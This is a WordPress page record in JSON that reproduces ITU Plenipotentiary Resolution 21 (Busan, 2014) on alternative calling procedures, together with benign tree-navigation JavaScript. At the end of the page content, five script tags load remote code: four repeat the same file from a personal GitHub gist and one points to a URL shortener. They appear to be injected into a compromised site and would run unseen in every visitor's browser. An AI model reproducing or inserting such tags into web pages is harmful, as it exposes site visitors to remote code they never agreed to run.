{"id":1724,"date":"2015-06-30T15:08:59","date_gmt":"2015-06-30T19:08:59","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=1724"},"modified":"2015-06-30T15:08:59","modified_gmt":"2015-06-30T19:08:59","slug":"pp-2014_21","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2014\/pp-2014_21\/","title":{"rendered":"PP Resolution 21"},"content":{"rendered":"<p><style type=\"text\/css\">\nbody {}\n\n:link { color: #0000ff; text-decoration:none;}\n:visited { color: #6666ff; text-decoration:none; }\na:active { color: #0000ff; text-decoration:none;}\na:hover {color: #0000ff; text-decoration:underline; }\n\ndiv.basetext {}\n\ndiv.basetop {}\n\nh1 {\n    text-align:center;\n}\n\nspan.h2 {}\n\ndiv.year {}\n\ndiv.form {}\n\nspan.cpt {}\n\nspan.cm {}\n\n.fl {}\n\nul {}\n\nli {}\n\nul li {\n\tlist-style:square;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n\nli.basic {\n\tlist-style:square;\n\tlist-style-image:none;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\nspan.links {\n}\n\n\n\n\n.sub { display: none; }\n.subexp {display: block; }\n.sub { display: none; } \n\n.subexp {display: block; } \n\nli.exp {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.col {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.exp_active {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;  \n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer;\n}\n\nli.col_active {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer; \/* if not included, bullets are not shown right in moz*\/\n}\n\n\nli.basic_active {\n  list-style:square;\n  list-style-image:none;\n  background-color:#eeeeff;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\n\/* the 'boxed' and 'attributes' styles are used to display notes and attributes\n*\/\n\n.boxed,.nodecontent {display:inline;}\n.boxed .note-and-attributes {display:none;}\n\n.boxed:hover .note-and-attributes {\n\tposition:fixed; top:2em;right:10px;z-index:3;\n\tdisplay:block;\n\tmin-width:33%;\n\tmax-width:60%;\n\tmax-height:95%;\n\tcolor:black;\n\tbackground:#ffffff;\n\tfont:normal 16px courier, sans-serif;\n\tborder:1px solid black;\n\tpadding:10px;\n}\n\n.note:before {\n\tcontent:\"NOTE: \";\n\tfont-weight:bold;\n}\n\ntable.attributes {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable.attributes td,th {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\ntable.attributes th {\n\ttext-align:center;\n}\ntable.attributes caption {\n\tmargin-top:1em;\n\tfont-style:italic;\n\ttext-align:center;\n}\n\/* Thanks to wolfgangradke, https:\/\/sourceforge.net\/forum\/message.php?msg_id=5991663 *\/\ndiv.nodecontent > p {\n\tmargin-top:0pt;\n\tmargin-bottom:0pt;\n\tdisplay:inline;\n}\n\np + p { \n \tmargin-top: 0.5em !important;\n\tdisplay:block !important;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747128&group_id=7118*\/\ntable {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable td {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747000&group_id=7118*\/\nol {\n\tmargin-top:1px;\n    margin-bottom:1px;\n\tmargin-left:0px;\n\tpadding-left:3%;\n}\n\nol li {\n\tlist-style:decimal;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n<\/style><br \/>\n<script type=\"text\/javascript\">\r\n\/* MarkTree JavaScript code\r\n * \r\n * Distributed under the terms of the MIT License.\r\n * See \"LICENCE.MIT\" or http:\/\/www.opensource.org\/licenses\/mit-license.php for details.\r\n *\r\n * Software distributed under the License is distributed on an \"AS IS\" basis,\r\n * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\r\n * for the specific language governing rights and limitations under the\r\n * License.\r\n * \r\n * Miika Nurminen, 12.7.2004.\r\n *\/\r\n\r\n\/* cross-browser (tested with ie5, mozilla 1 and opera 5) keypress detection *\/\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u2030vi\u2030 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/script><\/p>\n<h3><span style=\"\">PP RESOLUTION 21 (Rev. Busan, 2014)<\/span><\/h3>\n<h4><span style=\"\">Measures concerning alternative calling procedures on international telecommunication networks<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        Resolution 20 (Rev. Dubai, 2012) of the World Telecommunication Standardization Assembly (WTSA), on procedures for allocation and management of international telecommunication numbering, naming, addressing and identification (NNAI) resources;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        Resolution 29 (Rev. Dubai, 2012) of WTSA, on alternative calling procedures on international telecommunication networks;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        Resolution 22 (Rev. Dubai, 2014) of the World Telecommunication Development Conference, on alternative calling procedures on international telecommunication networks, identification of origin and apportionment of revenues in providing international telecommunication services;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        that each Member State has the sovereign right to allow or prohibit certain forms of alternative calling procedures in order to address their impact on its national telecommunication networks;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        the interests of developing countries1;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        the interests of consumers and users of telecommunication services;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g)        the need of some Member States to identify the origin of calls, taking into account the relevant ITU recommendations;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h)        that some forms of alternative calling procedures may have an impact on quality of service (QoS), quality of experience (QoE) and the performance of telecommunication networks;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        the benefits of competition in delivering lower costs and choice to consumers;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">j)        that there are a myriad of different stakeholders impacted by alternative calling procedures;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">k)        that the understanding of what is an alternative calling procedure has evolved over time,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">considering<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that the use of some alternative calling procedures may adversely affect the economies of developing countries and may seriously hamper the efforts made by those countries to ensure the sound development of their telecommunication\/information and communication technology networks and services;<\/div>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">b)        that some forms of alternative calling procedures may have an impact on traffic management, network planning and the quality and performance of telecommunication networks;<\/div>\n<ul class=\"sub\">\n<li class=\"basic\"><img decoding=\"async\" src=\"pp%2021.html_files\/icons\/button_cancel.png\" alt=\"button_cancel\" \/>\n<div class=\"nodecontent\">b) that some forms of alternative calling procedures may have an impact on traffic management and network planning and degrade the quality and performance of the public switched telephone network (PSTN);<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that the use of certain alternative calling procedures that are not harmful to networks may contribute to competition in the interests of consumers;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        that a number of relevant Telecommunication Standardization Sector (ITU\u2011T) recommendations, particularly those of ITU\u2011T Study Groups 2 and 3, that address, from several points of view, including technical and financial, the effects of alternative calling procedures on the performance and development of telecommunication networks,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recalling<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">the ITU workshop on &#8220;caller ID spoofing&#8221; that ITU\u2011T Study Group 2 held in Geneva on 2 June 2014,<\/div>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recalling<\/div>\n<ul class=\"sub\">\n<li class=\"exp\">\n<div class=\"nodecontent\">a) Resolution 21 (Rev. Marrakesh, 2002) of the Plenipotentiary Conference, on alternative calling procedures on telecommunication networks, which:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">&#8211; urged Member States to cooperate among themselves to resolve difficulties in order to ensure that national laws and regulations of ITU Member States are respected;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">&#8211; instructed ITU-T to accelerate its studies with a view to developing appropriate solutions and recommendations;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">b) Resolution 29 (Rev. Florianpolis, 2004) of the World Telecommunication Standardization Assembly (WTSA), which resolves that:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">&#8211; administrations and recognized operating agencies (ROA) should take all reasonable measures, within the constraints of their national law, to suspend alternative calling procedures which seriously degrade the quality and performance of the PSTN;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">&#8211; administrations and ROAs should take a cooperative and reasonable approach to respecting the national sovereignty of others;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">&#8211; further studies are required to evaluate the economic effects of call-back on the effort of countries with economies in transition, developing countries, and especially least developed countries, for sound development of their local telecommunication networks and services, and to evaluate the effectiveness of the suggested guidelines for consultation on call-back;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c) Resolution 22 (Rev. Doha, 2006) of the World Telecommunication Development Conference, which is based on amendments to Resolutions 20 and 29 (Rev. Florianpolis, 2004) of WTSA,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">aware<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) that, as at October 2006, 114 Member States had notified the Telecommunication Standardization Bureau that call-back is prohibited on their territory;<\/div>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">a)        that ITU\u2011T has concluded that certain alternative calling procedures such as constant calling (or bombardment or polling) and answer suppression seriously degrade the quality and the performance of the telecommunication networks;<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">b) that ITU-T has concluded that certain alternative calling procedures such as constant calling (or bombardment or polling) and answer suppression seriously degrade the quality and the performance of the PSTN;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">b)        that appropriate ITU\u2011T study groups and ITU Telecommunication Development Sector (ITU\u2011D) study groups are cooperating on issues related to alternative calling procedures and telecommunication origin identification,<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">c) that appropriate ITU-T study groups are cooperating on issues related to alternative calling procedures, including refile, call-back, and telecommunication origin identification,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to identify and describe all forms of alternative calling procedures and assess their impact on all parties, and to review relevant ITU\u2011T recommendations in order to address any negative effects that alternative calling procedures have on all parties;<\/div>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">2        to encourage administrations and operating agencies authorized by Member States to take the appropriate measures to provide an acceptable level of QoS and QoE, to ensure the delivery of International calling line identification (CLI) and origin identification (OI) information, wherever possible, and consistent with national law, and to ensure the appropriate charging taking into account the relevant ITU recommendations;<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1 to encourage administrations and international telecommunication operators to implement the ITU-T recommendations referred to in considering d) in order to limit the negative effects that, in some cases, alternative calling procedures have on developing countries;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to develop guidelines for administrations and operating agencies authorized by Member States on the measures that can be considered, within the constraints of their national law, to address the impact of alternative calling procedures;<\/div>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">4        to request the appropriate ITU\u2011T study groups, particularly Study Groups 2 and 3, and ITU\u2011D study groups, through contributions of Member States and Sector Members, to continue to study:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">3 to request the appropriate ITU-T study groups, through contributions of Member States and Sector Members, to continue to study alternative calling procedures, such as refile and call-back, and issues related to identification of origin, in order to take into account the importance of these studies as they relate to next-generation networks and network degradation,<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        alternative calling procedures, as a result of resolves 1, in order to update relevant ITU\u2011T recommendations;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">ii)        issues related to OI and CLI, in order to take into account the importance of these studies as they relate to next-generation networks and network degradation,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Director of the Telecommunication Development Bureau and the Director of the Telecommunication Standardization Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to collaborate on further studies, based on contributions from Member States, Sector Members and other members, to evaluate the effects of alternative calling procedures on consumers, the effect on countries with economies in transition, developing countries and especially least developed countries, for sound development of their local telecommunication networks and services in respect of originating and terminating calls using alternative calling procedures;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to develop guidelines for Member States and Sector Members with regard to all aspects of alternative calling procedures, based on resolves 1 and 4 above;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to evaluate the effectiveness of the suggested guidelines for consultation on alternative calling procedures;<\/div>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">4        to collaborate so as to avoid overlap and duplication of effort in studying issues related to different forms of alternative calling procedures,<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">2 to collaborate so as to avoid overlap and duplication of effort in studying issues related to refile, call-back and identification of origin.<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites Member States<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to encourage their administrations and operating agencies authorized by Member States to implement the ITU\u2011T recommendations referred to in considering d) in order to limit the negative effects that, in some cases, some alternative calling procedures have on developing countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        which permit the use of alternative calling procedures on their territory in accordance with their national regulations to pay due regard to the decisions of other administrations and operating agencies authorized by Member States whose regulations do not permit such alternative calling procedures;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to cooperate to resolve difficulties in order to ensure that national laws and regulations of ITU Member States are respected;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to contribute to this work,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites Sector Members<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        in their international operations, to pay due regard to the decisions of other administrations whose regulations do not permit such alternative calling procedures;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to contribute to this work.<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 21 (Rev. Busan, 2014) Measures concerning alternative calling procedures on international telecommunication networks The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014), recognizing a) Resolution 20 (Rev. Dubai, 2012) of the World Telecommunication Standardization Assembly (WTSA), on procedures for allocation and management of international telecommunication numbering, naming, addressing and identification (NNAI) 